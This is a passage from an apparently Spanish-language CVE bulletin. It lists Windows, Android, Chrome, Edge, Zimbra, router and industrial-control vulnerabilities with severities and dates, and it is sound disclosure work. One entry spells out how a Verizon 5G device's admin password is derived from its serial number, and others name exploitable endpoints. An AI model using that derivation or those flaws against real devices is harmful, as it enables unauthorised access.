    Una Vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-33641, CVE-2022-33642, CVE-2022-33643, CVE-2022-33650, CVE-2022-33651, CVE-2022-33652, CVE-2022-33653, CVE-2022-33654, CVE-2022-33655, CVE-2022-33656, CVE-2022-33657, CVE-2022-33658, CVE-2022-33659, CVE-2022-33660, CVE-2022-33661, CVE-2022-33662, CVE-2022-33663, CVE-2022-33664, CVE-2022-33665, CVE-2022-33666, CVE-2022-33667, CVE-2022-33668, CVE-2022-33669, CVE-2022-33671, CVE-2022-33672, CVE-2022-33673, CVE-2022-33674, CVE-2022-33675, CVE-2022-33677
  • CVE-2022-30223
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información en Windows Hyper-V. Este ID de CVE es diferente de CVE-2022-22042
  • CVE-2022-30224
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Advanced Local Procedure Call. Este ID de CVE es diferente de CVE-2022-22037, CVE-2022-30202
  • CVE-2022-30225
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Media Player Network Sharing Service
  • CVE-2022-30226
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-22022, CVE-2022-22041, CVE-2022-30206
  • CVE-2022-33632
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Microsoft Office
  • CVE-2022-20382
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En (TBD) de (TBD), se presenta una posible escritura fuera de límites debido al desbordamiento de pila del kernel. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-214245176, Referencias: Kernel ascendente
  • CVE-2022-20376
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En la función trusty_log_seq_start del archivo trusty-log.c, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-216130110, Referencias: N/A
  • CVE-2022-20371
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En la función dm_bow_dtr y funciones relacionadas del archivo dm-bow.c, se presenta un posible uso de memoria previamente liberada debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-195565510, Referencias: Kernel ascendente
  • CVE-2022-20250
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En Messaging, es posible adjuntar archivos a un mensaje sin que sea comprobado el acceso de forma apropiada debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-226134095
  • CVE-2022-20237
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En la función BuildDevIDResponse del archivo miscdatabuilder.cpp, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una ejecución remota de código sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-229621649, Referencias: N/A
  • CVE-2021-0735
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible forma de conseguir información sobre los paquetes instalados ignorando las limitaciones introducidas en Android 11 debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-188913056
  • CVE-2022-28376
    Severidad: MEDIA
    Fecha de publicación: 03/04/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos exteriores LVSKIHP de Verizon 5G Home hasta el 2022-02-15 permiten a cualquiera (conociendo el número de serie del dispositivo) acceder a un sitio web de administración del CPE, por ejemplo, en la dirección IP 10.0.0.1. La contraseña (para el nombre de usuario de Verizon) se calcula concatenando el número de serie y el modelo (es decir, la cadena LVSKIHP), ejecutando el programa sha256sum y extrayendo los siete primeros caracteres concatenados con los siete últimos de ese valor SHA-256
  • CVE-2022-30707
    Severidad: MEDIA
    Fecha de publicación: 28/06/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una violación de los principios de diseño seguro en la comunicación de CAMS para HIS. Los productos y versiones afectados son: la serie CENTUM en la que está instalado el LHS4800 (CENTUM CS 3000 y CENTUM CS 3000 Small R3.08.10 a R3.09.00), la serie CENTUM en la que se usa la función CAMS (CENTUM VP, CENTUM VP Small y CENTUM VP Basic R4.01.00 a R4.03. 00), la serie CENTUM independientemente del uso de la función CAMS (CENTUM VP, CENTUM VP Small y CENTUM VP Basic R5.01.00 a R5.04.20 y R6.01.00 a R6.09.00), Exaopc R3. 72.00 a R3.80.00 (sólo si está instalado el NTPF100-S6 "Para CENTUM soporte VP CAMS para HIS"), B/M9000 CS R5.04.01 a R5.05.01, y B/M9000 VP R6.01.01 a R8.03.01). Si un atacante adyacente logra comprometer un ordenador usando el software CAMS for HIS, puede usar las credenciales de la máquina comprometida para acceder a los datos de otra máquina que use el software CAMS for HIS. Esto puede conllevar a una inhabilitación de las funciones del software CAMS for HIS en cualquier máquina afectada, o la divulgación/alteración de información
  • Vulnerabilidad en Orion (CVE-2021-35248)
    Severidad: MEDIA
    Fecha de publicación: 20/12/2021
    Fecha de última actualización: 03/08/2023
    Se ha informado de que cualquier usuario de Orion, por ejemplo, las cuentas de invitados pueden consultar la entidad Orion.UserSettings y enumerar los usuarios y su configuración básica
  • CVE-2022-0803
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Permissions en Google Chrome versiones anteriores a 99.0.4844.51, permitía a un atacante remoto manipular el contenido de la Omnibox (barra de URL) por medio de una página HTML diseñada
  • CVE-2022-0799
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una aplicación insuficiente de políticas en Installer de Google Chrome en Windows versiones anteriores a 99.0.4844.51, permitía a un atacante remoto llevar a cabo una escalada de privilegios local por medio de un archivo de instalación sin conexión diseñado
  • CVE-2022-0797
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Un acceso a memoria fuera de límites en Mojo en Google Chrome versiones anteriores a 99.0.4844.51, permitía a un atacante remoto llevar a cabo una escritura en memoria fuera de límites por medio de una página HTML diseñada
  • CVE-2021-4068
    Severidad: MEDIA
    Fecha de publicación: 23/12/2021
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de datos en new tab page en Google Chrome versiones anteriores a 96.0.4664.93, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-0809
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Un acceso a la memoria fuera de límites en WebXR en Google Chrome versiones anteriores a 99.0.4844.51, permitía a un atacante remoto explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-0806
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Un filtrado de datos en Canvas en Google Chrome versiones anteriores a 99.0.4844.51, permitía a un atacante remoto que convenciera a un usuario de participar en una pantalla compartida filtrar potencialmente datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-23033
    Severidad: MEDIA
    Fecha de publicación: 25/01/2022
    Fecha de última actualización: 08/08/2023
    arm: la función guest_physmap_remove_page no elimina los mapeos p2m Las funciones para eliminar una o más entradas de una tabla de páginas p2m de huésped en Arm (p2m_remove_mapping, guest_physmap_remove_page y p2m_set_entry con mfn establecido como INVALID_MFN) no borran realmente la entrada de la tabla de páginas si la entrada no presenta el bit válido establecido. Es posible tener una entrada válida en la tabla de páginas sin el bit válido establecido cuando un sistema operativo huésped usa instrucciones de mantenimiento de caché set/way. Por ejemplo, un huésped que emite una instrucción de mantenimiento de caché set/way, y luego llama a la hiperllamada XENMEM_decrease_reservation para devolver páginas de memoria a Xen, podría ser capaz de retener el acceso a esas páginas incluso después de que Xen empezara a reusarlas para otros propósitos
  • CVE-2022-24475
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-26900
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-26895
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-26894
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-26891
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-26912
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909
  • CVE-2022-26909
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26912
  • CVE-2022-26908
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (Chromium-based). Este ID de CVE es diferente de CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26909, CVE-2022-26912
  • CVE-2022-2165
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de datos en URL formatting en Google Chrome versiones anteriores a 103.0.5060.53, permitía a un atacante remoto llevar a cabo una suplantación de dominio mediante homógrafos de IDN por medio de un nombre de dominio diseñado
  • CVE-2022-2160
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Una aplicación insuficiente de políticas en DevTools en Google Chrome en Windows versiones anteriores a 103.0.5060.53, permitía que un atacante que convenciera a un usuario de instalar una extensión maliciosa obtuviera información potencialmente confidencial de los archivos locales de un usuario por medio de una página HTML diseñada
  • CVE-2022-2158
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Una confusión de tipo en V8 en Google Chrome versiones anteriores a 103.0.5060.53, permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-2607
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Tab Strip en Google Chrome en Chrome OS versiones anteriores a 104.0.5112.79, permitía a un atacante remoto que convencía a un usuario de participar en interacciones de usuario específicas para explotar potencialmente la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-2623
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Offline en Google Chrome en Android versiones anteriores a 104.0.5112.79, permitía a un atacante remoto que convencía a un usuario de participar en interacciones de usuario específicas para explotar potencialmente la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-2622
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de entradas no confiables en Safe Browsing de Google Chrome en Windows versiones anteriores a 104.0.5112.79, permitía a un atacante remoto omitir las restricciones de descarga por medio de un archivo diseñado.
  • CVE-2022-2621
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Extensions en Google Chrome versiones anteriores a 104.0.5112.79, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa explotar potencialmente la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-2620
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en WebUI en Google Chrome en Chrome OS versiones anteriores a 104.0.5112.79, permitía a un atacante remoto que convenciera a un usuario para participar en las interacciones de usuario específicas para potencialmente explotar la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-2619
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de entradas no confiables en Settings de Google Chrome versiones anteriores a 104.0.5112.79, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa inyectar scripts o HTML en una página privilegiada por medio de una página HTML diseñada.
  • CVE-2022-2617
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Extensions API de Google Chrome versiones anteriores a 104.0.5112.79, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa explotar potencialmente la corrupción de la pila por medio de interacciones de la Interfaz de Usuario específicas.
  • CVE-2022-36526
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link GO-RT-AC750 versiones GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 son vulnerables a una omisión de autenticación por medio de la función phpcgi_main en cgibin.
  • CVE-2022-36524
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link GO-RT-AC750 versiones GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 son vulnerables a las credenciales estáticas por defecto por medio del archivo /etc/init0.d/S80telnetd.sh.
  • CVE-2022-2609
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Nearby Share en Google Chrome en Chrome OS versiones anteriores a 104.0.5112.79, permitía a un atacante remoto que convencía a un usuario de participar en interacciones de usuario específicas explotar potencialmente la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-2608
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Un uso de la memoria previamente liberada en Overview Mode en Google Chrome en Chrome OS versiones anteriores a 104.0.5112.79, permitía a un atacante remoto que convencía a un usuario de participar en interacciones de usuario específicas para explotar potencialmente la corrupción de la pila por medio de interacciones de Interfaz de Usuario específicas.
  • CVE-2022-20315
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ActivityManager, se presenta una posible divulgación de los paquetes instalados debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-191058227
  • CVE-2022-20312
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En WifiP2pManager, es posible obtener la dirección MAC de WiFi P2P sin el consentimiento del usuario debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-192244925
  • CVE-2022-20311
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telecomm, se presenta una posible divulgación de las cuentas telefónicas autogestionadas registradas debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-192663553
  • CVE-2022-20310
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telecomm, se presenta una posible divulgación de cuentas telefónicas autogestionadas registradas debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-192663798
  • CVE-2022-20305
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, se presenta una posible divulgación de los tipos de cuenta disponibles debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-199751623
  • CVE-2022-20303
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, es posible determinar si una cuenta está en el dispositivo sin permiso GET_ACCOUNTS debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-200573021
  • CVE-2022-20301
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Content, es posible comprobar si una cuenta existe en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-200956614
  • CVE-2022-20300
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Content, es posible comprobar si la cuenta dada existe en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-200956588
  • CVE-2022-20299
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, es posible comprobar si la cuenta dada se presenta en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-201415895
  • CVE-2022-20298
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, se presenta una posible forma de comprobar si una cuenta existe en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a la divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-201416182
  • CVE-2022-20296
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, es posible comprobar si una cuenta existe en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-201794303
  • CVE-2022-20295
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ContentService, se presenta una posible forma de comprobar si una cuenta existe en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-202160584
  • CVE-2022-20294
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Content, se presenta una posible forma de conocer una cuenta presente en el dispositivo debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-202160705
  • CVE-2022-20341
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ConnectivityService, se presenta una posible evasión de los permisos de red debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local de las interfaces de anclaje sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-162952629
  • CVE-2022-20270
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Content, se presenta una posible forma de conocer el nombre de la cuenta de gmail en el dispositivo gracias a una omisión de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-209005023
  • CVE-2022-20274
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Keyguard, falta una comprobación de permisos. Esto podría conllevar a una escalada local de privilegios y la prevención del tiempo de espera de la pantalla con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-206470146
  • CVE-2022-20276
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En DevicePolicyManager, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-205706731
  • CVE-2022-20277
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En DevicePolicyManager, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información por canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-205145497
  • CVE-2022-20279
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En DevicePolicyManager, se presenta una posible forma de determinar si una app está instalada, sin permisos de consulta, debido a una divulgación de información por canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-204877302
  • CVE-2022-20281
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Core, existe la posibilidad de iniciar una actividad desde el fondo debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios, con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-204083967
  • CVE-2022-20275
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En DevicePolicyManager, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-205836975
  • CVE-2022-20285
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-230868108
  • CVE-2022-20284
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telephony, se presenta una posible divulgación de información debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local de cuentas de teléfono con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-231986341
  • CVE-2022-20287
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En AppSearchManagerService, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información por canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-204082784
  • CVE-2022-20282
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En AppWidget, se presenta una posibilidad de iniciar una actividad desde el fondo debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-204083104
  • CVE-2022-20288
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En AppSearchManagerService, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información por canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-204082360
  • CVE-2022-35555
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de inyección de comandos en /goform/exeCommand en Tenda W6 versión V1.0.0.9(4122), que permite a atacantes construir parámetros cmdinput para la ejecución de comandos arbitrarios.
  • CVE-2022-37042
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    Zimbra Collaboration Suite (ZCS) versiones 8.8.15 y 9.0, presenta una funcionalidad mboximport que recibe un archivo ZIP y extrae archivos de él. Al omitir la autenticación (es decir, al no tener un authtoken), un atacante puede cargar archivos arbitrarios en el sistema, conllevando a un salto de directorios y una ejecución de código remota. NOTA: este problema existe debido a una corrección incompleta de CVE-2022-27925.
  • CVE-2022-20289
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageInstaller, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-203683960
  • CVE-2022-20332
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible forma de determinar si una aplicación está instalada, sin permisos de consulta, debido a una divulgación de información de canal lateral. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-180019130
  • CVE-2022-20290
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Midi, se presenta una posible forma de conocer los dispositivos midi privados debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-203549963
  • CVE-2022-38183
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
